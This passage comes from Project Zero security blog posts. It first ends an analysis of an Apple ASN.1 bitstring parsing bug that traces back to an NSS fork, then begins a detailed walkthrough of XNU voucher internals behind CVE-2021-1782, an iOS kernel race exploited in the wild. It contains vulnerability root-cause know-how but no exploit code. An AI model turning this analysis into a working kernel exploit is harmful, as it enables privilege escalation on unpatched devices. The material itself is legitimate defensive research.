So at that point (24 August 2001) the NSS codebase had some dead code which looked like it was trying to handle parsing an ASN.1 bitstring which didn't have an unused-bits byte. As we've seen in the rest of this post though, that handling is quite wrong, but it didn't matter as the code was unreachable.

The earliest reference to Apple's fork of that NSS code I can find is in the SecurityNssAsn1-11 package for OS X 10.3 (Panther) which would have been released October 24th, 2003. In that project we can find a CHANGES.apple file which tells us a little more about the origins of Apple's fork:

General Notes

-------------

1. This module, SecurityNssAsn1, is based on the Netscape Security

   Services ("NSS") portion of the Mozilla Browser project. The

   source upon which SecurityNssAsn1 was based was pulled from

   the Mozilla CVS repository, top of tree as of January 21, 2003.

   The SecurityNssAsn1 project contains only those portions of NSS

   used to perform BER encoding and decoding, along with minimal

   support required by the encode/decode routines.

2. The directory structure of SecurityNssAsn1 differs significantly

   from that of NSS, rendering simple diffs to document changes

   unwieldy. Diffs could still be performed on a file-by-file basis.

   

3. All Apple changes are flagged by the symbol __APPLE__, either

   via "#ifdef __APPLE__" or in a comment.

That document continues on to outline a number of broad changes which Apple made to the code, including reformatting the code and changing a number of APIs to add new features. We also learn the date at which Apple forked the code (January 21, 2003) so we can go back through a github mirror of the mozilla CVS repository to find the version of secasn1d.c as it would have appeared then and diff them.

From that diff we can see that the Apple developers actually made fairly significant changes in this initial import, indicating that this code underwent some level of review prior to importing it. For example:

@@ -1584,7 +1692,15 @@

     /*

      * If our child was just our end-of-contents octets, we are done.

      */

+       #ifdef  __APPLE__

+       /*

+        * Without the check for !child->indefinite, this path could

+        * be taken erroneously if the child is indefinite!

+        */

+       if(child->endofcontents && !child->indefinite) {

+       #else

     if (child->endofcontents) {

They were pretty clearly looking for potential correctness issues with the code while they were refactoring it. The example shown above is a non-trivial change and one which persists to this day. (And I have no idea whether the NSS or Apple version is correct!) Reading the diff we can see that not every change ended up being marked with #ifdef __APPLE__ or a comment. They also made this change to sec_asn1d_parse_bit_string:

@@ -1372,26 +1469,33 @@

     /*PORT_Assert (state->pending > 0); */

     PORT_Assert (state->place == beforeBitString);

 

-    if (state->pending == 0) {

-       if (state->dest != NULL) {

-           SECItem *item = (SECItem *)(state->dest);

-           item->data = NULL;

-           item->len = 0;

-           state->place = beforeEndOfContents;

-           return 0;

-       }

+    if ((state->pending == 0) || (state->contents_length == 1)) {

+               if (state->dest != NULL) {

+                       SECItem *item = (SECItem *)(state->dest);

+                       item->Data = NULL;

+                       item->Length = 0;

+                       state->place = beforeEndOfContents;

+               }

+               if(state->contents_length == 1) {

+                       /* skip over (unused) remainder byte */

+                       return 1;

+               }

+               else {

+                       return 0;

+               }

     }

In the context of all the other changes in this initial import this change looks much less suspicious than I first thought. My guess is that the Apple developers thought that Mozilla had missed handling the case of a bitstring with only the unused-bits byte and attempted to add support for it. The state->pending == 0 conditional looks like Mozilla's check for handling a 0-length bitstring, so it was quite reasonable to think that NULLing out item->data was the right way to handle that case, and therefore that it must also be correct to add the contents_length == 1 case here.

In reality the contents_length == 1 case was already handled perfectly correctly in sec_asn1d_parse_more_bit_string, but it wasn't unreasonable to assume that it had been overlooked, based on what looked like special-case handling of the missing unused-bits byte in sec_asn1d_parse_bit_string.

The fix for the bug was simply to revert the change made during the initial import 18 years ago, removing the "|| (state->contents_length == 1)" special case and making the dangerous but unreachable code unreachable once more:

    if ((state->pending == 0) || (state->contents_length == 1)) {

        if (state->dest != NULL) {

            SecAsn1Item *item = (SecAsn1Item *)(state->dest);

            item->Data = NULL;

            item->Length = 0;

            state->place = beforeEndOfContents;

        }

        if(state->contents_length == 1) {

            /* skip over (unused) remainder byte */

            return 1;

        }

        else {

            return 0;

        }

    }

Conclusions

Forking complicated code is complicated. In this case it took almost two decades before a change made during the initial import was, in the end, simply reverted. Even verifying whether this revert is correct is really hard.

The Mozilla and Apple codebases have continued to diverge since 2003. As I discovered slightly too late to be useful, the Mozilla code now has more comments trying to explain the decoder's "novel" memory safety approach.

Rewriting this code to be more understandable (and maybe even memory safe) is also distinctly non-trivial. The code doesn't just implement ASN.1 decoding; it also has to support safely decoding incorrectly encoded data, as described by this verbatim comment for example:

 /*

  * Okay, this is a hack.  It *should* be an error whether

  * pending is too big or too small, but it turns out that

  * we had a bug in our *old* DER encoder that ended up

  * counting an explicit header twice in the case where

  * the underlying type was an ANY.  So, because we cannot

  * prevent receiving these (our own certificate server can

  * send them to us), we need to be lenient and accept them.

  * To do so, we need to pretend as if we read all of the

  * bytes that the header said we would find, even though

  * we actually came up short.

  */

Verifying that a rewritten, simpler decoder also handles every hard-coded edge case correctly probably leads to it not being so simple after all.

CVE-2021-1782, an iOS in-the-wild vulnerability in vouchers

14 April 2022 at 15:58

Posted by Ian Beer, Google Project Zero

This blog post is my analysis of a vulnerability exploited in the wild and patched in early 2021. Like the writeup published last week looking at an ASN.1 parser bug, this blog post is based on the notes I took as I was analyzing the patch and trying to understand the XNU vouchers subsystem. I hope that this writeup serves as the missing documentation for how some of the internals of the voucher subsystem work and the quirks which led to this vulnerability.

CVE-2021-1782 was fixed in iOS 14.4, as noted by @s1guza on twitter:

"So iOS 14.4 added locks around this code bit (user_data_get_value() in ipc_voucher.c). "e_made" seems to function as a refcount, and you should be able to race this with itself and cause some refs to get lost, eventually giving you a double free"

This vulnerability was fixed on January 26th 2021, and Apple updated the iOS 14.4 release notes on May 28th 2021 to indicate that the issue may have been actively exploited:

Kernel. Available for: iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation). Impact: A malicious application may be able to elevate privileges. Apple is aware of a report that this issue may have been actively exploited. Description: A race condition was addressed with improved locking. CVE-2021-1782: an anonymous researcher. Entry updated May 28, 2021

Vouchers

What exactly is a voucher?

The kernel code has a concise description:

Vouchers are a reference counted immutable (once-created) set of indexes to particular resource manager attribute values (which themselves are reference counted).

That definition is technically correct, though perhaps not all that helpful by itself.

To actually understand the root cause and exploitability of this vulnerability is going to require covering a lot of the voucher codebase. This part of XNU is pretty obscure, and pretty complicated.

A voucher is a reference-counted table of keys and values. Pointers to all created vouchers are stored in the global ivht_bucket hash table.

For a particular set of keys and values there should only be one voucher object. During the creation of a voucher there is a deduplication stage where the new voucher is compared against all existing vouchers in the hashtable to ensure they remain unique, returning a reference to the existing voucher if a duplicate has been found.

Here's the structure of a voucher:

struct ipc_voucher {

  iv_index_t     iv_hash;        /* checksum hash */

  iv_index_t     iv_sum;         /* checksum of values */

  os_refcnt_t    iv_refs;        /* reference count */

  iv_index_t     iv_table_size;  /* size of the voucher table */

  iv_index_t     iv_inline_table[IV_ENTRIES_INLINE];

  iv_entry_t     iv_table;       /* table of voucher attr entries */

  ipc_port_t     iv_port;        /* port representing the voucher */

  queue_chain_t  iv_hash_link;   /* link on hash chain */

};

 

#define IV_ENTRIES_INLINE MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN

The voucher codebase is written in a very generic, extensible way, even though its actual use and supported feature set is quite minimal.

Keys

Keys in vouchers are not arbitrary. Keys are indexes into a voucher's iv_table; a value's position in the iv_table determines what "key" it was stored under. Whilst the vouchers codebase supports the runtime addition of new key types this feature isn't used and there are just a small number of fixed, well-known keys:

#define MACH_VOUCHER_ATTR_KEY_ALL ((mach_voucher_attr_key_t)~0)

#define MACH_VOUCHER_ATTR_KEY_NONE ((mach_voucher_attr_key_t)0)

 

/* other well-known-keys will be added here */

#define MACH_VOUCHER_ATTR_KEY_ATM ((mach_voucher_attr_key_t)1)

#define MACH_VOUCHER_ATTR_KEY_IMPORTANCE ((mach_voucher_attr_key_t)2)

#define MACH_VOUCHER_ATTR_KEY_BANK ((mach_voucher_attr_key_t)3)

#define MACH_VOUCHER_ATTR_KEY_PTHPRIORITY ((mach_voucher_attr_key_t)4)

 

#define MACH_VOUCHER_ATTR_KEY_USER_DATA ((mach_voucher_attr_key_t)7)

 

#define MACH_VOUCHER_ATTR_KEY_TEST ((mach_voucher_attr_key_t)8)

 

#define MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN MACH_VOUCHER_ATTR_KEY_TEST

The iv_inline_table in an ipc_voucher has 8 entries. But of those, only four are actually supported and have any associated functionality. The ATM voucher attributes are deprecated and the code supporting them is gone so only IMPORTANCE (2), BANK (3), PTHPRIORITY (4) and USER_DATA (7) are valid keys. There's some confusion (perhaps on my part) about when exactly you should use the term key and when attribute; I'll use them interchangeably to refer to these key values and the corresponding "types" of values which they manage. More on that later.

Values

Each entry in a voucher iv_table is an iv_index_t:

typedef natural_t iv_index_t;

Each value is again an index; this time into a per-key cache of values, abstracted as a "Voucher Attribute Cache Control Object" represented by this structure:

struct ipc_voucher_attr_control {

os_refcnt_t   ivac_refs;

boolean_t     ivac_is_growing;      /* is the table being grown */

ivac_entry_t  ivac_table;           /* table of voucher attr value entries */

iv_index_t    ivac_table_size;      /* size of the attr value table */

iv_index_t    ivac_init_table_size; /* size of the attr value table */

iv_index_t    ivac_freelist;        /* index of the first free element */

ipc_port_t    ivac_port;            /* port for accessing the cache control  */

lck_spin_t    ivac_lock_data;

iv_index_t    ivac_key_index;       /* key index for this value */

};

These are accessed indirectly via another global table:

static ipc_voucher_global_table_element iv_global_table[MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN];

(Again, the comments in the code indicate that in the future this table may grow in size and allow attributes to be managed in userspace, but for now it's just a fixed-size array.)

Each element in that table has this structure:

typedef struct ipc_voucher_global_table_element {

        ipc_voucher_attr_manager_t      ivgte_manager;

        ipc_voucher_attr_control_t      ivgte_control;

        mach_voucher_attr_key_t         ivgte_key;

} ipc_voucher_global_table_element;

Both the iv_global_table and each voucher's iv_table are indexed by (key-1), not key, so the userdata entry is [6], not [7], even though the array still has 8 entries.

The ipc_voucher_attr_control_t provides an abstract interface for managing "values" and the ipc_voucher_attr_manager_t provides the "type-specific" logic to implement the semantics of each type (here by type I mean "key" or "attr" type.) Let's look more concretely at what that means. Here's the definition of ipc_voucher_attr_manager_t:

struct ipc_voucher_attr_manager {

  ipc_voucher_attr_manager_release_value_t    ivam_release_value;

  ipc_voucher_attr_manager_get_value_t        ivam_get_value;

  ipc_voucher_attr_manager_extract_content_t  ivam_extract_content;

  ipc_voucher_attr_manager_command_t          ivam_command;

  ipc_voucher_attr_manager_release_t          ivam_release;

  ipc_voucher_attr_manager_flags              ivam_flags;

};

ivam_flags is an int containing some flags; the other five fields are function pointers which define the semantics of the particular attr type. Here's the ipc_voucher_attr_manager structure for the user_data type:

const struct ipc_voucher_attr_manager user_data_manager = {

  .ivam_release_value =   user_data_release_value,

  .ivam_get_value =       user_data_get_value,

  .ivam_extract_content = user_data_extract_content,

  .ivam_command =         user_data_command,

  .ivam_release =         user_data_release,

  .ivam_flags =           IVAM_FLAGS_NONE,

};

Those five function pointers are the only interface from the generic voucher code into the type-specific code. The interface may seem simple but there are some tricky subtleties in there; we'll get to that later!

Let's go back to the generic ipc_voucher_attr_control structure which maintains the "values" for each key in a type-agnostic way. The most important field is ivac_entry_t ivac_table, which is an array of ivac_entry_s's. It's an index into this table which is stored in each voucher's iv_table.

Here's the structure of each entry in that table:

struct ivac_entry_s {

  iv_value_handle_t ivace_value;

  iv_value_refs_t   ivace_layered:1,   /* layered effective entry */

                    ivace_releasing:1, /* release in progress */

                    ivace_free:1,      /* on freelist */

                    ivace_persist:1,   /* Persist the entry, don't

                                           count made refs */

                    ivace_refs:28;     /* reference count */

  union {

    iv_value_refs_t ivaceu_made;       /* made count (non-layered) */

    iv_index_t      ivaceu_layer;      /* next effective layer

                                          (layered) */

  } ivace_u;

  iv_index_t        ivace_next;        /* hash or freelist */

  iv_index_t        ivace_index;       /* hash head (independent) */

};

ivace_refs is a reference count for this table index. Note that this entry is inline in an array; so this reference count going to zero doesn't cause the ivac_entry_s to be free'd back to a kernel allocator (like the zone allocator for example.) Instead, it moves this table index onto a freelist of empty entries. The table can grow but never shrink.
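A minimal sketch of what that freelist recycling might look like (this is my guess at the shape of the release path, not the actual XNU code; only the field names come from the structures above):

static void
sketch_ivace_release_slot(ipc_voucher_attr_control_t ivac, iv_index_t idx)
{
        /* assumption: dropping the last ref just recycles the slot in place */
        ivac_entry_t entry = &ivac->ivac_table[idx];
        entry->ivace_value = 0;
        entry->ivace_free = 1;                   /* mark it as being on the freelist */
        entry->ivace_next = ivac->ivac_freelist; /* link by table index, not pointer */
        ivac->ivac_freelist = idx;
}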

Table entries which aren't free store a type-specific "handle" in ivace_value. Here's the typedef chain for that type:

iv_value_handle_t ivace_value

typedef mach_voucher_attr_value_handle_t iv_value_handle_t;

typedef uint64_t mach_voucher_attr_value_handle_t;

The handle is a uint64_t but in reality the attrs can (and do) store pointers there, hidden behind casts.

A guarantee made by the attr_control is that there will only ever be one (live) ivac_entry_s for a particular ivace_value. This means that each time a new ivace_value needs an ivac_entry the attr_control's ivac_table needs to be searched to see if a matching value is already present. To speed this up in-use ivac_entries are linked together in hash buckets so that a (hopefully significantly) shorter linked-list of entries can be searched rather than a linear scan of the whole table. (Note that it's not a linked-list of pointers; each link in the chain is an index into the table.)
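Putting the two levels of indexing together, here's a minimal sketch (not real kernel code; locking and bounds checks omitted) of how a voucher's value handle for a given key gets resolved. The real implementations are iv_lookup and ivace_lookup_values, both shown later:

static iv_value_handle_t
sketch_voucher_value_lookup(ipc_voucher_t iv, mach_voucher_attr_key_t key)
{
        iv_index_t key_index = (iv_index_t)key - 1;      /* e.g. USER_DATA (7) -> [6] */
        iv_index_t val_index = iv->iv_table[key_index];  /* per-voucher value slot */
        ipc_voucher_attr_control_t ivac =
            iv_global_table[key_index].ivgte_control;    /* that key's controller */
        return ivac->ivac_table[val_index].ivace_value;  /* e.g. a user_data_value_element * */
}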

Userdata attrs

user_data is one of the four supported, implemented voucher attr types. Its only purpose is to manage buffers of arbitrary, user controlled data. Since the attr_control performs deduping only on the ivace_value (which is a pointer) the userdata attr manager is responsible for ensuring that userdata values which have identical buffer values (matching length and bytes) have identical pointers.

To do this it maintains a hash table of user_data_value_element structures, which wrap a variable-sized buffer of bytes:

struct user_data_value_element {

  mach_voucher_attr_value_reference_t e_made;

  mach_voucher_attr_content_size_t    e_size;

  iv_index_t                          e_sum;

  iv_index_t                          e_hash;

  queue_chain_t                       e_hash_link;

  uint8_t                             e_data[];

};

Each inline e_data buffer can be up to 16KB. e_hash_link stores the hash-table bucket list pointer.

e_made is not a simple reference count. Looking through the code you'll notice that there are no places where it's ever decremented. Since there should (nearly) always be a 1:1 mapping between an ivace_entry and a user_data_value_element this structure shouldn't need to be reference counted. There is however one very fiddly race condition (which isn't the race condition which causes the vulnerability!) which necessitates the e_made field. This race condition is sort-of documented and we'll get there eventually...

Recipes

The host_create_mach_voucher host port MIG (Mach Interface Generator) method is the userspace interface for creating vouchers:

kern_return_t

host_create_mach_voucher(mach_port_name_t host,

    mach_voucher_attr_raw_recipe_array_t recipes,

    mach_voucher_attr_recipe_size_t recipesCnt,

    mach_port_name_t *voucher);

recipes points to a buffer filled with a sequence of packed variable-size mach_voucher_attr_recipe_data structures:

typedef struct mach_voucher_attr_recipe_data {

  mach_voucher_attr_key_t            key;

  mach_voucher_attr_recipe_command_t command;

  mach_voucher_name_t                previous_voucher;

  mach_voucher_attr_content_size_t   content_size;

  uint8_t                            content[];

} mach_voucher_attr_recipe_data_t;

key is one of the four supported voucher attr types we've seen before (importance, bank, pthread_priority and user_data) or a wildcard value (MACH_VOUCHER_ATTR_KEY_ALL) indicating that the command should apply to all keys. There are a number of generic commands as well as type-specific commands. Commands can optionally refer to existing vouchers via the previous_voucher field, which should name a voucher port.

Here are the supported generic commands for voucher creation:

MACH_VOUCHER_ATTR_COPY: copy the attr value from the previous voucher. You can specify the wildcard key to copy all the attr values from the previous voucher.

MACH_VOUCHER_ATTR_REMOVE: remove the specified attr value from the voucher under construction. This can also remove all the attributes from the voucher under construction (which, arguably, makes no sense.)

MACH_VOUCHER_ATTR_SET_VALUE_HANDLE: this command is only valid for kernel clients; it allows the caller to specify an arbitrary ivace_value, which doesn't make sense for userspace and shouldn't be reachable.

MACH_VOUCHER_ATTR_REDEEM: the semantics of redeeming an attribute from a previous voucher are not defined by the voucher code; it's up to the individual managers to determine what that might mean.

Here are the attr-specific commands for voucher creation for each type:

bank:

MACH_VOUCHER_ATTR_BANK_CREATE

MACH_VOUCHER_ATTR_BANK_MODIFY_PERSONA

MACH_VOUCHER_ATTR_AUTO_REDEEM

MACH_VOUCHER_ATTR_SEND_PREPROCESS

importance:

MACH_VOUCHER_ATTR_IMPORTANCE_SELF

user_data:

MACH_VOUCHER_ATTR_USER_DATA_STORE

pthread_priority:

MACH_VOUCHER_ATTR_PTHPRIORITY_CREATE

Note that there are further commands which can be "executed against" vouchers via the mach_voucher_attr_command MIG method which calls the attr manager's ivam_command function pointer. Those are:

bank:

BANK_ORIGINATOR_PID

BANK_PERSONA_TOKEN

BANK_PERSONA_ID

importance:

MACH_VOUCHER_IMPORTANCE_ATTR_DROP_EXTERNAL

user_data:

none

pthread_priority:

none

Let's look at an example recipe for creating a voucher with a single user_data attr, consisting of the 4 bytes {0x41, 0x41, 0x41, 0x41}:

struct udata_dword_recipe {

  mach_voucher_attr_recipe_data_t recipe;

  uint32_t payload;

};

struct udata_dword_recipe r = {0};

r.recipe.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

r.recipe.command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

r.recipe.content_size = sizeof(uint32_t);

r.payload = 0x41414141;
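As a usage sketch (my own, not from the original code), handing that recipe to the kernel from userspace would look something like this, assuming <mach/mach.h> is included and provides the MIG stub for host_create_mach_voucher whose prototype we saw above:

mach_port_t voucher = MACH_PORT_NULL;
kern_return_t kr = host_create_mach_voucher(
    mach_host_self(),                          /* the host port */
    (mach_voucher_attr_raw_recipe_array_t)&r,  /* packed recipe buffer from above */
    sizeof(r),                                 /* recipesCnt: total bytes of all sub-recipes */
    &voucher);                                 /* out: a send right to the voucher port */

Submitting the exact same recipe a second time should hand back a reference to the same deduplicated voucher object, per the iv_dedup step described below.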

Let's follow the path of this recipe in detail.

Here's the most important part of host_create_mach_voucher showing the three high-level phases: voucher allocation, attribute creation and voucher de-duping. It's not the responsibility of this code to find or allocate a mach port for the voucher; that's done by the MIG layer code.

/* allocate new voucher */

voucher = iv_alloc(ivgt_keys_in_use);

if (IV_NULL == voucher) {

  return KERN_RESOURCE_SHORTAGE;

}

 /* iterate over the recipe items */

while (0 < recipe_size - recipe_used) {

  ipc_voucher_t prev_iv;

  if (recipe_size - recipe_used < sizeof(*sub_recipe)) {

    kr = KERN_INVALID_ARGUMENT;

    break;

  }

  /* find the next recipe */

  sub_recipe =

    (mach_voucher_attr_recipe_t)(void *)&recipes[recipe_used];

  if (recipe_size - recipe_used - sizeof(*sub_recipe) <

      sub_recipe->content_size) {

    kr = KERN_INVALID_ARGUMENT;

    break;

  }

  recipe_used += sizeof(*sub_recipe) + sub_recipe->content_size;

  /* convert voucher port name (current space) */

  /* into a voucher reference */

  prev_iv =

    convert_port_name_to_voucher(sub_recipe->previous_voucher);

  if (MACH_PORT_NULL != sub_recipe->previous_voucher &&

      IV_NULL == prev_iv) {

    kr = KERN_INVALID_CAPABILITY;

    break;

  }

  kr = ipc_execute_voucher_recipe_command(

         voucher,

         sub_recipe->key,

         sub_recipe->command,

         prev_iv,

         sub_recipe->content,

         sub_recipe->content_size,

         FALSE);

  ipc_voucher_release(prev_iv);

  if (KERN_SUCCESS != kr) {

    break;

  }

}

if (KERN_SUCCESS == kr) {

  *new_voucher = iv_dedup(voucher);

} else {

  *new_voucher = IV_NULL;

  iv_dealloc(voucher, FALSE);

}

At the top of this snippet a new voucher is allocated in iv_alloc. ipc_execute_voucher_recipe_command is then called in a loop to consume however many sub-recipe structures were provided by userspace. Each sub-recipe can optionally refer to an existing voucher via the sub-recipe previous_voucher field. Note that MIG doesn't natively support variable-sized structures containing ports so it's passed as a mach port name which is looked up in the calling task's mach port namespace and converted to a voucher reference by convert_port_name_to_voucher. The intended functionality here is to be able to refer to attrs in other vouchers to copy or "redeem" them. As discussed, the semantics of redeeming a voucher attr isn't defined by the abstract voucher code and it's up to the individual attr managers to decide what that means.

Once the entire recipe has been consumed and all the iv_table entries filled in, iv_dedup then searches the ivht_bucket hash table to see if there's an existing voucher with a matching set of attributes. Remember that each attribute value stored in a voucher is an index into the attribute controller's attribute table; and those attributes are unique, so it suffices to simply compare the array of voucher indexes to determine whether all attribute values are equal. If a matching voucher is found, iv_dedup returns a reference to the existing voucher and calls iv_dealloc to free the newly-created voucher. Otherwise, if no existing, matching voucher is found, iv_dedup adds the newly created voucher to the ivht_bucket hash table.
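The comparison itself isn't shown here, but conceptually it boils down to something like this sketch (my own simplification, not the actual iv_dedup code): because attr values are uniquified, two vouchers carry the same attributes exactly when their tables of value indexes match.

static boolean_t
sketch_vouchers_have_equal_values(ipc_voucher_t a, ipc_voucher_t b)
{
        if (a->iv_table_size != b->iv_table_size) {
                return FALSE;
        }
        /* each entry is an index into the attr controller's table, and those
           entries are already deduplicated, so index equality is value equality */
        return memcmp(a->iv_table, b->iv_table,
                   a->iv_table_size * sizeof(iv_index_t)) == 0;
}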

Let's look at ipc_execute_voucher_recipe_command which is responsible for filling in the requested entries in the voucher iv_table. Note that key and command are arbitrary, controlled dwords. content is a pointer to a buffer of controlled bytes, and content_size is the correct size of that input buffer. The MIG layer limits the overall input size of the recipe (which is a collection of sub-recipes) to 5260 bytes, and any input content buffers would have to fit in there.

static kern_return_t

ipc_execute_voucher_recipe_command(

  ipc_voucher_t                      voucher,

  mach_voucher_attr_key_t            key,

  mach_voucher_attr_recipe_command_t command,

  ipc_voucher_t                      prev_iv,

  mach_voucher_attr_content_t        content,

  mach_voucher_attr_content_size_t   content_size,

  boolean_t                          key_priv)

{

  iv_index_t prev_val_index;

  iv_index_t val_index;

  kern_return_t kr;

  switch (command) {

MACH_VOUCHER_ATTR_USER_DATA_STORE isn't one of the switch statement case values here so the code falls through to the default case:

        default:

                kr = ipc_replace_voucher_value(voucher,

                    key,

                    command,

                    prev_iv,

                    content,

                    content_size);

                if (KERN_SUCCESS != kr) {

                        return kr;

                }

                break;

        }

        return KERN_SUCCESS;

Here's that code:

static kern_return_t

ipc_replace_voucher_value(

        ipc_voucher_t                           voucher,

        mach_voucher_attr_key_t                 key,

        mach_voucher_attr_recipe_command_t      command,

        ipc_voucher_t                           prev_voucher,

        mach_voucher_attr_content_t             content,

        mach_voucher_attr_content_size_t        content_size)

{

...

        /*

         * Get the manager for this key_index.

         * Returns a reference on the control.

         */

        key_index = iv_key_to_index(key);

        ivgt_lookup(key_index, TRUE, &ivam, &ivac);

        if (IVAM_NULL == ivam) {

                return KERN_INVALID_ARGUMENT;

        }

..

iv_key_to_index just subtracts 1 from key (assuming it's valid and not MACH_VOUCHER_ATRR_KEY_ALL):

static inline iv_index_t

iv_key_to_index(mach_voucher_attr_key_t key)

{

        if (MACH_VOUCHER_ATTR_KEY_ALL == key ||

            MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN < key) {

                return IV_UNUSED_KEYINDEX;

        }

        return (iv_index_t)key - 1;

}

ivgt_lookup then gets a reference on that key's attr manager and attr controller. The manager is really just a bunch of function pointers which define the semantics of what different "key types" actually mean; and the controller stores (and caches) values for those keys.

Let's keep reading ipc_replace_voucher_value. Here's the next statement:

        /* save the current value stored in the forming voucher */

        save_val_index = iv_lookup(voucher, key_index);

This point is important for getting a good feeling for how the voucher code is supposed to work; recipes can refer not only to other vouchers (via the previous_voucher port) but they can also refer to themselves during creation. You don't have to have just one sub-recipe per attr type for which you wish to have a value in your voucher; you can specify multiple sub-recipes for that type. Does it actually make any sense to do that? Well, luckily for the security researcher we don't have to worry about whether functionality actually makes any sense; it's all just a weird machine to us! (There are allusions in the code to future functionality where attribute values can be "layered" or "linked" but for now such functionality doesn't exist.)
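To make that concrete, here's a hypothetical recipe buffer with two sub-recipes for the same key, following the same layout pattern as the earlier example: the first stores a user_data value and the second redeems it. Because the redeem sub-recipe passes MACH_PORT_NULL as previous_voucher, it ends up operating on the value already stored in the voucher under construction (that's the save_val_index path in the code we're walking through):

struct udata_store_then_redeem {
  mach_voucher_attr_recipe_data_t store;
  uint32_t payload;                        /* content of the store sub-recipe */
  mach_voucher_attr_recipe_data_t redeem;  /* content_size stays 0 */
};

struct udata_store_then_redeem r2 = {0};
r2.store.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;
r2.store.command = MACH_VOUCHER_ATTR_USER_DATA_STORE;
r2.store.content_size = sizeof(uint32_t);
r2.payload = 0x41414141;
r2.redeem.key = MACH_VOUCHER_ATTR_KEY_USER_DATA;
r2.redeem.command = MACH_VOUCHER_ATTR_REDEEM;
r2.redeem.previous_voucher = MACH_PORT_NULL;

As we'll see in user_data_get_value below, redeeming here just bumps the stored element's e_made and returns the same value, so the voucher's user_data attr value is unchanged.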

iv_lookup returns the "value index" for the given key in the particular voucher. That means it just returns the iv_index_t in the iv_table of the given voucher:

static inline iv_index_t

iv_lookup(ipc_voucher_t iv, iv_index_t key_index)

{

        if (key_index < iv->iv_table_size) {

                return iv->iv_table[key_index];

        }

        return IV_UNUSED_VALINDEX;

}

This value index uniquely identifies an existing attribute value, but you need to ask the attribute's controller for the actual value. Before getting that previous value though, the code first determines whether this sub-recipe might be trying to refer to the value currently stored by this voucher or has explicitly passed in a previous_voucher. The value in the previous voucher takes precedence over whatever is already in the under-construction voucher.

        prev_val_index = (IV_NULL != prev_voucher) ?

            iv_lookup(prev_voucher, key_index) :

            save_val_index;

Then the code looks up the actual previous value to operate on:

        ivace_lookup_values(key_index, prev_val_index,

            previous_vals, &previous_vals_count);

key_index is the key we're operating on, MACH_VOUCHER_ATTR_KEY_USER_DATA in this example. This function is called ivace_lookup_values (note the plural). There are some comments in the voucher code indicating that maybe in the future values could themselves be put into a linked-list such that you could have larger values (or layered/chained values.) But this functionality isn't implemented; ivace_lookup_values will only ever return 1 value.

Here's ivace_lookup_values:

static void

ivace_lookup_values(

        iv_index_t                              key_index,

        iv_index_t                              value_index,

        mach_voucher_attr_value_handle_array_t          values,

        mach_voucher_attr_value_handle_array_size_t     *count)

{

        ipc_voucher_attr_control_t ivac;

        ivac_entry_t ivace;

        if (IV_UNUSED_VALINDEX == value_index ||

            MACH_VOUCHER_ATTR_KEY_NUM_WELL_KNOWN <= key_index) {

                *count = 0;

                return;

        }

        ivac = iv_global_table[key_index].ivgte_control;

        assert(IVAC_NULL != ivac);

        /*

         * Get the entry and then the linked values.

         */

        ivac_lock(ivac);

        assert(value_index < ivac->ivac_table_size);

        ivace = &ivac->ivac_table[value_index];

        /*

         * TODO: support chained values (for effective vouchers).

         */

        assert(ivace->ivace_refs > 0);

        values[0] = ivace->ivace_value;

        ivac_unlock(ivac);

        *count = 1;

}

The locking used in the vouchers code is very important for properly understanding the underlying vulnerability when we eventually get there, but for now I'm glossing over it and we'll return to examine the relevant locks when necessary.

Let's discuss the ivace_lookup_values code. They index the iv_global_table to get a pointer to the attribute type's controller:

        ivac = iv_global_table[key_index].ivgte_control;

They take that controller's lock then index its ivac_table to find that value's struct ivac_entry_s and read the ivace_value value from there:

        ivac_lock(ivac);

        assert(value_index < ivac->ivac_table_size);

        ivace = &ivac->ivac_table[value_index];

        assert(ivace->ivace_refs > 0);

        values[0] = ivace->ivace_value;

        ivac_unlock(ivac);

        *count = 1;

Let's go back to the calling function (ipc_replace_voucher_value) and keep reading:

        /* Call out to resource manager to get new value */

        new_value_voucher = IV_NULL;

        kr = (ivam->ivam_get_value)(

                ivam, key, command,

                previous_vals, previous_vals_count,

                content, content_size,

                &new_value, &new_flag, &new_value_voucher);

        if (KERN_SUCCESS != kr) {

                ivac_release(ivac);

                return kr;

        }

ivam->ivam_get_value is calling the attribute type's function pointer which defines the meaning for the particular type of "get_value". The term get_value here is a little confusing; aren't we trying to store a new value? (and there's no subsequent call to a method like "store_value".) A better way to think about the semantics of get_value is that it's meant to evaluate both previous_vals (either the value from previous_voucher or the value currently in this voucher) and content (the arbitrary byte buffer from this sub-recipe) and combine/evaluate them to create a value representation. It's then up to the controller layer to store/cache that value. (Actually there's one tedious snag in this system which we'll get to involving locking...)

ivam_get_value for the user_data attribute type is user_data_get_value:

static kern_return_t

user_data_get_value(

        ipc_voucher_attr_manager_t                      __assert_only manager,

        mach_voucher_attr_key_t                         __assert_only key,

        mach_voucher_attr_recipe_command_t              command,

        mach_voucher_attr_value_handle_array_t          prev_values,

        mach_voucher_attr_value_handle_array_size_t     prev_value_count,

        mach_voucher_attr_content_t                     content,

        mach_voucher_attr_content_size_t                content_size,

        mach_voucher_attr_value_handle_t                *out_value,

        mach_voucher_attr_value_flags_t                 *out_flags,

        ipc_voucher_t                                   *out_value_voucher)

{

        user_data_element_t elem;

        assert(&user_data_manager == manager);

        USER_DATA_ASSERT_KEY(key);

        /* never an out voucher */

        *out_value_voucher = IPC_VOUCHER_NULL;

        *out_flags = MACH_VOUCHER_ATTR_VALUE_FLAGS_NONE;

        switch (command) {

        case MACH_VOUCHER_ATTR_REDEEM:

                /* redeem of previous values is the value */

                if (0 < prev_value_count) {

                        elem = (user_data_element_t)prev_values[0];

                        assert(0 < elem->e_made);

                        elem->e_made++;

                        *out_value = prev_values[0];

                        return KERN_SUCCESS;

                }

                /* redeem of default is default */

                *out_value = 0;

                return KERN_SUCCESS;

        case MACH_VOUCHER_ATTR_USER_DATA_STORE:

                if (USER_DATA_MAX_DATA < content_size) {

                        return KERN_RESOURCE_SHORTAGE;

                }

                /* empty is the default */

                if (0 == content_size) {

                        *out_value = 0;

                        return KERN_SUCCESS;

                }

                elem = user_data_dedup(content, content_size);

                *out_value = (mach_voucher_attr_value_handle_t)elem;

                return KERN_SUCCESS;

        default:

                /* every other command is unknown */

